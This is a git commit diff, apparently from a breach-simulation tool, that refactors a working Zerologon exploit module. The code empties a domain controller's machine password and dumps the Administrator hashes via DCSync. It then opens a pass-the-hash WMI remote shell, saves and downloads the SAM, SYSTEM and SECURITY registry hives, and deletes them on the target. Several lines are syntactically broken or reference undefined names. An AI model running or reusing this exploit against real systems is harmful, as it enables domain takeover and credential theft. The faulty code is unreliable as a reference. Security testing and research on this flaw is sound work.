Clean up code and comments

This commit is contained in:
Shreya 2021-01-26 16:52:48 +05:30
parent 53ef6feadf
commit 13ef69c3ed
2 changed files with 84 additions and 78 deletions

View File

@ -15,7 +15,9 @@ import os
import re
import sys
import time
import traceback
from binascii import hexlify, unhexlify
from typing import List
import impacket
from Cryptodome.Cipher import AES, ARC4, DES
@ -43,7 +45,7 @@ _orig_stdout = None
_new_stdout = None
def _set_stdout_to_in_memory():
def _set_stdout_to_in_memory_text_stream():
# set stdout to in-memory text stream, to capture info that would otherwise be printed
_orig_stdout = sys.stdout
_new_stdout = io.StringIO()
@ -65,16 +67,19 @@ class ZerologonExploiter(HostExploiter):
{
'aes_key': None,
'bootkey': None,
'can_process_SAM_LSA': True,
'dc_ip': None,
'debug': False,
'exec_method': 'smbexec',
'hashes': None,
'history': False,
'is_remote' True,
'just_dc': True,
'just_dc_ntlm': False,
'just_dc_user': None,
'k': False,
'keytab': None,
'no_lmhash': True,
'no_pass': True,
'ntds': None,
'outputfile': None,
@ -96,7 +101,7 @@ class ZerologonExploiter(HostExploiter):
self.zerologon_finger = ZerologonFinger()
def _exploit_host(self):
DC_IP, DC_NAME, DC_HANDLE = self.get_dc_details()
DC_IP, DC_NAME, DC_HANDLE = self.zerologon_finger.get_dc_details()
if self.is_exploitable():
LOG.info("Target vulnerable, changing account password to empty string.")
@ -127,19 +132,21 @@ class ZerologonExploiter(HostExploiter):
else:
LOG.info("Non-zero return code, something went wrong.")
# restore password
self.restore_password(DC_HANDLE, DC_IP, DC_NAME)
_exploited = True
## how do i execute monkey on the exploited machine?
else:
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
_exploited = False
def get_dc_details(self):
dc_ip = self.host.ip_addr
dc_name = self.zerologon_finger.get_dc_name(dc_ip)
dc_handle = '\\\\' + dc_name
return dc_ip, dc_name, dc_handle
# Restore DC's original password.
if _exploited:
try:
self.restore_password(DC_HANDLE, DC_IP, DC_NAME)
LOG.info("System exploited and password restored successfully.")
except:
LOG.info("System exploited but couldn't restore password!")
def is_exploitable(self):
return self.zerologon_finger.get_host_fingerprint(self.host)
@ -166,7 +173,6 @@ class ZerologonExploiter(HostExploiter):
return rpc_con.request(request)
def restore_password(self, DC_HANDLE, DC_IP, DC_NAME):
# Keep authenticating until successful.
LOG.info("Restoring original password...")
LOG.info("DCSync; getting original password hashes.")
@ -177,7 +183,10 @@ class ZerologonExploiter(HostExploiter):
raise Exception("Couldn't extract admin password's hashes.")
original_pwd_nthash = self.get_original_pwd_nthash(DC_IP, admin_pwd_hashes)
if not original_pwd_nthash:
raise Exception("Couldn't extract original DC password's nthash.")
# Keep authenticating until successful.
for _ in range(0, self.MAX_ATTEMPTS):
rpc_con = self.attempt_restoration(DC_HANDLE, DC_IP, DC_NAME, original_pwd_nthash)
if rpc_con is not None:
@ -195,67 +204,63 @@ class ZerologonExploiter(HostExploiter):
options = self.OPTIONS_FOR_SECRETSDUMP.copy()
options['target'] = '$@'.join([DC_NAME, DC_IP]) # format for DC account - "NetBIOSName$@0.0.0.0"
options['target_ip'] = DC_IP
options['dc_ip'] = DC_IP
domain, username, password, remote_name = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options['target']).groups('')
# In case the password contains '@'
if '@' in remote_name:
password = password + '@' + remote_name.rpartition('@')[0]
remote_name = remote_name.rpartition('@')[2]
dumped_secrets = self.get_dumped_secrets(remote_name=remote_name,
username=username,
password=password,
domain=domain,
options=options)
dumped_secrets = self.get_dumped_secrets(options=options
remote_name=DC_IP,
username=DC_NAME)
for secret in dumped_secrets:
if 'Administrator' in secret:
hashes = secret.split(':')[2:4] # format of secret hashes - "domain\uid:rid:lmhash:nthash:::"
hashes = secret.split(':')[2:4] # format of secret - "domain\uid:rid:lmhash:nthash:::"
return ':'.join(hashes) # format - "lmhash:nthash"
def get_original_pwd_nthash(self, DC_IP, admin_pwd_hashes):
self.save_HKLM_keys_locally(DC_IP, admin_pwd_hashes)
def get_original_pwd_nthash(self, DC_IP, admin_pwd_hashes) -> str:
if not self.save_HKLM_keys_locally(DC_IP, admin_pwd_hashes):
return
options = self.OPTIONS_FOR_SECRETSDUMP.copy()
for name in ['system', 'sam', 'security']:
options[name] = os.path.join(os.path.expanduser('~'), f'monkey-{name}.save')
options['dc_ip'] = DC_IP
dumped_secrets = self.get_dumped_secrets(remote_name='LOCAL',
options=options)
dumped_secrets = self.get_dumped_secrets(options=options,
remote_name='LOCAL')
for secret in dumped_secrets:
if '$MACHINE.ACC: ' in secret: # format - "$MACHINE.ACC: lmhash:nthash"
nthash = secret.split(':')[-1]
if '$MACHINE.ACC: ' in secret: # format of secret - "$MACHINE.ACC: lmhash:nthash"
nthash = secret.split(':')[2]
return nthash
def get_dumped_secrets(self, remote_name='', username='', password='', domain='', options):
def get_dumped_secrets(self, options, remote_name='', username='', password='', domain='') -> List[str]:
dumper = DumpSecrets(remote_name, username, password, domain, options)
dumped_secrets = dumper.dump().split('\n')
return dumped_secrets
def save_HKLM_keys_locally(self, DC_IP, admin_pwd_hashes):
remote_shell = WmiexecRemoteShell(host=self.host,
wmiexec = Wmiexec(ip=DC_IP,
username='Administrator',
domain=DC_IP,
hashes=':'.join(admin_pwd_hashes))
if remote_shell:
_set_stdout_to_in_memory()
hashes=admin_pwd_hashes,
domain=DC_IP)
# save HKLM keys on host
remote_shell = wmiexec.run()
if remote_shell:
_set_stdout_to_in_memory_text_stream()
# Save HKLM keys on host.
shell.onecmd('reg save HKLM\SYSTEM system.save && ' +
'reg save HKLM\SAM sam.save && ' +
'reg save HKLM\SECURITY security.save')
# get HKLM keys locally (can't run these together because it needs to call do_get())
# Get HKLM keys locally (can't run these together because it needs to call do_get()).
shell.onecmd('get system.save')
shell.onecmd('get sam.save')
shell.onecmd('get security.save')
# delete saved keys from host
# Delete saved keys on host.
shell.onecmd('del /f system.save sam.save security.save')
info = _unset_stdout_and_return_captured()
LOG.debug(f"Getting victim HKLM keys via remote shell: {info}")
return True
else:
raise Exception("Could not start remote shell on DC.")
@ -364,8 +369,8 @@ class DumpSecrets:
self.__sam_hive = options['sam']
self.__ntds_file = options['ntds']
self.__history = options['history']
self.__no_lmhash = True
self.__is_remote = True
self.__no_lmhash = options['no_lmhash']
self.__is_remote = options['is_remote']
self.__output_file_name = options['outputfile']
self.__do_kerberos = options['k']
self.__just_DC = options['just_dc']
@ -374,7 +379,7 @@ class DumpSecrets:
self.__pwd_last_set = options['pwd_last_set']
self.__print_user_status = options['user_status']
self.__resume_file_name = options['resumefile']
self.__can_process_SAM_LSA = True
self.__can_process_SAM_LSA = options['can_process_SAM_LSA']
self.__kdc_host = options['dc_ip']
self.__options = options
@ -386,7 +391,7 @@ class DumpSecrets:
self.__smb_connection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
def dump(self):
_set_stdout_in_memory()
_set_stdout_to_in_memory_text_stream()
dumped_secrets = ''
try:
@ -397,7 +402,7 @@ class DumpSecrets:
local_operations = LocalOperations(self.__system_hive)
bootkey = local_operations.getBootKey()
if self.__ntds_file is not None:
# Let's grab target's configuration about LM Hashes storage
# Let's grab target's configuration about LM Hashes storage.
self.__no_lmhash = local_operations.checkNoLMHashPolicy()
else:
import binascii
@ -424,20 +429,20 @@ class DumpSecrets:
if self.__just_DC is False and self.__just_DC_NTLM is False or self.__use_VSS_method is True:
self.__remote_ops.enableRegistry()
bootkey = self.__remote_ops.getBootKey()
# Let's check whether target system stores LM Hashes
# Let's check whether target system stores LM Hashes.
self.__no_lmhash = self.__remote_ops.checkNoLMHashPolicy()
except Exception as e:
self.__can_process_SAM_LSA = False
if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
and self.__do_kerberos is True:
# Giving some hints here when SPN target name validation is set to something different to Off
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/
# Giving some hints here when SPN target name validation is set to something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
LOG.error('Policy SPN target name validation might be restricting full DRSUAPI dump.' +
'Try -just-dc-user')
else:
LOG.error('RemoteOperations failed: %s' % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA
# If RemoteOperations succeeded, then we can extract SAM and LSA.
if self.__just_DC is False and self.__just_DC_NTLM is False and self.__can_process_SAM_LSA:
try:
if self.__is_remote is True:
@ -467,12 +472,10 @@ class DumpSecrets:
if self.__output_file_name is not None:
self.__LSA_secrets.exportSecrets(self.__output_file_name)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.debug(traceback.print_exc())
LOG.error('LSA hashes extraction failed: %s' % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@ -490,16 +493,14 @@ class DumpSecrets:
try:
self.__NTDS_hashes.dump()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
LOG.debug(traceback.print_exc())
if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
os.unlink(resume_file)
logging.error(e)
LOG.error(e)
if self.__just_user and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
LOG.error("You just got that error because there might be some duplicates of the same name. "
"Try specifying the domain name for the user as well. It is important to specify it "
@ -508,8 +509,7 @@ class DumpSecrets:
LOG.error('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
import traceback
print(traceback.format_exc())
LOG.debug(traceback.print_exc())
LOG.error(e)
if self.__NTDS_hashes is not None:
if isinstance(e, KeyboardInterrupt):
@ -544,12 +544,11 @@ class DumpSecrets:
# Adapted from https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
# Used to get HKLM keys for restoring original DC password
class WmiexecRemoteShell:
class Wmiexec:
OUTPUT_FILENAME = '__' + str(time.time())
CODEC = sys.stdout.encoding
def __init__(self, host, username, password='', domain='', hashes, share=None, noOutput=False):
self.host = host
def __init__(self, ip, username, hashes, password='', domain='', share=None, noOutput=False):
self.__ip = ip
self.__username = username
self.__password = password
self.__domain = domain
@ -560,14 +559,14 @@ class WmiexecRemoteShell:
def run(self):
if self.__noOutput is False:
smbConnection = SMBConnection(self.host.ip_addr, self.host.ip_addr)
smbConnection = SMBConnection(self.__ip, self.__ip)
smbConnection.login(user=self.__username,
password=self.__password,
domain=self.__domain,
lmhash=self.__lmhash,
nthash=self.__nthash)
dcom = DCOMConnection(target=self.host.ip_addr,
dcom = DCOMConnection(target=self.__ip,
username=self.__username,
password=self.__password,
domain=self.__domain,
@ -583,8 +582,9 @@ class WmiexecRemoteShell:
win32Process, _ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(self.__share, win32Process, smbConnection)
# return self.shell?
self.shell = RemoteShell(self.__share, win32Process, smbConnection, OUTPUT_FILENAME)
return self.shell
except (Exception, KeyboardInterrupt) as e:
LOG.error(str(e))
smbConnection.logoff()
@ -594,10 +594,12 @@ class WmiexecRemoteShell:
# Adapted from https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
# Used to start remote shell on victim
class RemoteShell(cmd.Cmd):
def __init__(self, share, win32Process, smbConnection):
CODEC = sys.stdout.encoding
def __init__(self, share, win32Process, smbConnection, outputFilename):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + self.OUTPUT_FILENAME
self.__output = '\\' + outputFilename
self.__outputBuffer = str('')
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
@ -644,16 +646,16 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer = ''
def default(self, line):
# Let's try to guess if the user is trying to change drive
# Let's try to guess if the user is trying to change drive.
if len(line) == 2 and line[1] == ':':
# Execute the command and see if the drive is valid
# Execute the command and see if the drive is valid.
self.execute_remote(line)
if len(self.__outputBuffer.strip('\r\n')) > 0:
# Something went wrong
# Something went wrong.
print(self.__outputBuffer)
self.__outputBuffer = ''
else:
# Drive valid, now we should get the current path
# Drive valid, now we should get the current path.
self.__pwd = line
self.execute_remote('cd ')
self.__pwd = self.__outputBuffer.strip('\r\n')
@ -683,11 +685,11 @@ class RemoteShell(cmd.Cmd):
break
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
# Output not finished, let's wait
# Output not finished, let's wait.
time.sleep(1)
pass
elif str(e).find('Broken') >= 0:
# The SMB Connection might have timed out, let's try reconnecting
# The SMB Connection might have timed out, let's try reconnecting.
LOG.debug('Connection broken, trying to recreate it')
self.__transferClient.reconnect()
return self.get_output()

View File

@ -22,14 +22,12 @@ class ZerologonFinger(HostFinger):
Checks if the Windows Server is vulnerable to Zerologon.
"""
DC_IP = host.ip_addr
DC_NAME = self.get_dc_name(DC_IP)
DC_IP, DC_NAME, DC_HANDLE = self.get_dc_details()
if DC_NAME: # if it is a Windows DC
# Keep authenticating until successful.
# Expected average number of attempts needed: 256.
# Approximate time taken by 2000 attempts: 40 seconds.
DC_HANDLE = '\\\\' + DC_NAME
LOG.info('Performing Zerologon authentication attempts...')
rpc_con = None
@ -57,6 +55,12 @@ class ZerologonFinger(HostFinger):
LOG.info('Error encountered; most likely not a Windows Domain Controller.')
return False
def get_dc_details(self):
DC_IP = self.host.ip_addr
DC_NAME = self.get_dc_name(DC_IP)
DC_HANDLE = '\\\\' + DC_NAME
return DC_IP, DC_NAME, DC_HANDLE
def get_dc_name(self, DC_IP):
"""
Gets NetBIOS name of the Domain Controller (DC).